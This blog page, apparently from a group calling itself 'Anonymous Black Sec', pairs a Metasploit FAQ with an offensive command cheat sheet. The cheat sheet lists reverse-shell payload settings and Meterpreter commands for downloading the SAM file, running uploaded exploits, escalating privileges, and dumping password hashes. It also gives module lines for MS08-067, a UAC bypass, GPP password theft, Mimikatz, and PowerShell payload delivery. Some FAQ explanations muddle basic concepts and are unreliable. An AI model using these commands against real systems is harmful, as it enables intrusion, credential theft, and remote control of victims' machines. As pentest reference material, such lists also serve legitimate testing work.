What is Metasploit?

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7.

Is Metasploit Framework free?

It is a free and open source network security tool notable for its contributions to red team collaboration allowing for shared sessions, data, and communication through a single Metasploit instance.

Is Metasploit a Virus?

Metasploit is a hacking tool. These tools, even though they are not by nature viruses, are considered as dangerous to victims of attacks.

Can I use Metasploit on Windows?

The Metasploit framework requires administrative rights to install on Windows, it will install by default in the c:\metasploit folder. Your AV on your Windows machine will generate alerts when you install and use Metasploit on Windows, so make sure to create the proper exceptions.

Does Metasploit have GUI?

msfgui is the Metasploit Framework Graphical User Interface. It provides the easiest way to use Metasploit, whether running locally or connecting remotely, build payloads, launch exploits, control sessions, and keep track of activity as you penetration test or just learn about security.

Do hackers use Kali Linux?

Yes, many hackers use Kali Linux but it is not only OS used by HackersKali Linux is used by hackers because it is a free OS and has over 600 tools for penetration testing and security analytics. Kali follows an open-source model and all the code is available on Git and allowed for tweaking.

What is Windows Meterpreter Reverse_tcp?

The php/meterpreter/reverse_tcp is a staged payload used to gain meterpreter access to a compromised system. This is a unique payload in the Metasploit Framework because this payload is one of the only payloads that are used in RFI vulnerabilities in web apps.

What is a Metasploit payload?

Payload, in simple terms, are simple scripts that the hackers utilize to interact with a hacked system. Using payloads, they can transfer data to a victim system.

How does Metasploit payload work?

When the payload is executed, Metasploit creates a listener on the correct port, and then establishes a connection to the target SMB service. Behind the scenes, when the target SMB service receives the connection, a function is invoked which contains a stack buffer that the attacking machine will overflow.

What is payload in Kali?

payload in Metasploit refers to an exploit module. There are three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages. Whether or not a payload is staged, is represented by ‘/’ in the payload name.

List of Metasploit Commands – Cheat sheet

List of Metasploit Commands, Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcpWindows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcpset ViewOnly falseMeterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcpMeterpreter Linux Reverse Payload

List of Metasploit Commands, Meterpreter Cheat Sheet

Useful meterpreter commands.

upload file c:\\windowsMeterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmpMeterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmpMeterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exeMeterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -cCreates new channel with cmd shell
psMeterpreter show processes
shellMeterpreter get shell on the target
getsystemMeterpreter attempts priviledge escalation the target
hashdumpMeterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r targetMeterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r targetMeterpreter delete port forward

Common Metasploit Modules

Remote Windows Metasploit Modules (exploits)

use exploit/windows/smb/ms08_067_netapiMS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapiMS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuacBypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

use auxiliary/scanner/http/dir_scannerMetasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscanMetasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_loginMetasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_versionMetasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_loginMetasploit Oracle Login Module

Metasploit Powershell Modules

use exploit/multi/script/web_deliveryMetasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershellMetasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployerMetasploit JBOSS deploy
use exploit/windows/mssql/mssql_payloadMetasploit MSSQL payload

Post Exploit Windows Metasploit Modules

run post/windows/gather/win_privsMetasploit show privileges of current user
use post/windows/gather/credentials/gppMetasploit grab GPP saved passwords
load mimikatz -> wdigestMetasplit load Mimikatz
run post/windows/gather/local_admin_search_enumIdenitfy other machines that the supplied domain user has administrative access to


Thanks For Reading

Recent Posts

Anonymous Black Sec

Anonymous Black Sec

We are Anonymous Anonymous Black Sec (ABSHQ)